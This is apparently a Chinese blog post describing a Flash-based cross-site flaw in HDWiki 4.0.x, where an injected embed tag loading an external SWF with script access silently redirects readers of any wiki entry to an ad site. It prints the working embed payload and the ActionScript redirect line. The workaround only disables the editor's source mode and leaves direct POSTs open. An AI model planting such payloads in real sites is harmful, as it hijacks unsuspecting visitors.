对HDWiki网站进行FLASH恶意代码加载与修复办法[HDWiki跨站漏洞]

今天下午在“百科”里发现异常情况:点开一个词条后,刚刚看到内容,就跳转到一个电影网站(要真是个电影网站还好点,可看到的是三个弹出网页,然后就广告广告,连那个最大的很像播放器的东东也是个广告,人渣啊)啦!郁闷的还以为是浏览器出问题啦,后退后退还是不行,看看链接也没有错啊,怀疑是不是域名被劫持啦,于是ping,对啊,换个浏览器打开域名首页,正确!
一个念头就是词条内容有问题,HD一直有个问题就是词条名字太长会被错误的截断,导致网页源码乱码(应该是编码字节处理没搞好),只有IE下会是乱码,一个一个点刚才的词条,有一次跳转发生啦,囧。

实施对HDWIKI百科网站的FLASH挂马欺骗(任何一个人点进词条自动跳转到目标网站)

只好把那个网页用迅雷下回来,看源码,没有太大异常,只有一个,发现”embed”半闭合标签,里边的Swf打开后跳转到目标网站,疑团解开啦,找办法修复。

怎样过滤词条添加过程中的SWF文件?发现使用正常的添加媒体按钮添加的SWF文件并没有任何问题(不会跳转)。

使用源码直接添加写好的SWF嵌入代码:

<embed type=”application/x-shockwave-flash”  src=”http://clin003.com/sa/1.swf” AllowScriptAccess=”always” />

对HDWIKI编辑器进行修复

跳转,囧,看来从编辑器里把插入SWF时附带的代码修改并不会起作用,对过滤语句的标签中添加“embed”,是不起作用的(HDwiki 4.0.3的编辑器),可能我写的有问题。

于是就取个最捷径的办法,把切换到源码模式的按钮事件所使用的函数语句注释掉!!

文件为“js”目录,“editor”文件夹下的“editor.js”(注释掉函数内容暂时解决)
hdwiki4.03的大概在1681行到1698行
hdwiki4.04的大概在965到973行

隐患
虽然从编辑器功能上进行啦防范,但仍然有可能利用(因为这段代码没有被过滤,可以直接发送制作好的数据包进行POST)

附注:
swf的跳转动作代码很简单

if(1){geturl(“http://clin003.com/”,”_self”);}

只要这样就可以啦,测试页面:http://clin003.com/sa/index.html (建议保存到不同的域名下试试效果)。

One Reply to “对HDWiki网站进行FLASH恶意代码加载与修复办法[HDWiki跨站漏洞]”

Comments are closed.